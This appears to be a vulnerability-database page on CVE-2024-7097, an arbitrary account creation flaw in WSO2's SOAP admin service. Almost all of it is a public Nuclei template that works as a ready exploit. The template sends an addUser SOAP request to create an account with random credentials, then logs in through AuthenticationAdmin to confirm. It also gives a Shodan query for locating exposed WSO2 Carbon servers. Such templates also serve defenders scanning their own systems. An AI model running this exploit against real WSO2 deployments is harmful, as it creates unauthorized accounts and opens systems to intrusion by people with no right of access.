CVE-2024-7097: WSO2 User Registration - Arbitrary Account Creation

日期: 2025-08-01 | 影响软件: WSO2 User Registration | POC: 已公开

漏洞描述

The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.

PoC代码[已公开]

id: CVE-2024-7097

info:
  name: WSO2 User Registration - Arbitrary Account Creation
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
  reference:
    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
  classification:
    epss-score: 0.00391
    epss-percentile: 0.59448
  metadata:
    verified: true
    max-request: 2
    shodan-query: "WSO2 Carbon Server"
  tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "urn:addUser"
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsd="http://org.apache.axis2/xsd">
           <soapenv:Header/>
           <soapenv:Body>
              <xsd:addUser>
        <xsd:user>
                 <xsd:userName>{{username}}</xsd:userName>
                 <xsd:password>{{password}}</xsd:password>
        </xsd:user>
              </xsd:addUser>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: status
        status:
          - 202
        internal: true

  - raw:
      - |
        POST /services/AuthenticationAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:aut="http://authentication.services.core.carbon.wso2.org">
           <soapenv:Header/>
           <soapenv:Body>
              <aut:login>
                 <aut:username>{{username}}</aut:username>
                 <aut:password>{{password}}</aut:password>
              </aut:login>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: word
        words:
          - "loginResponse"
          - "<ns:return>true</ns:return>"
        condition: and
# digest: 4a0a00473045022100decbb867a0f53f5be565ad425e45a72cfb9639ddba93296163d36b51fc69038502207165b5e8a64efd5746f0384a1e5a1c73cd71c7d305e687620e4fe65097942fbb:922c64590222798bb761d5b6d8e72950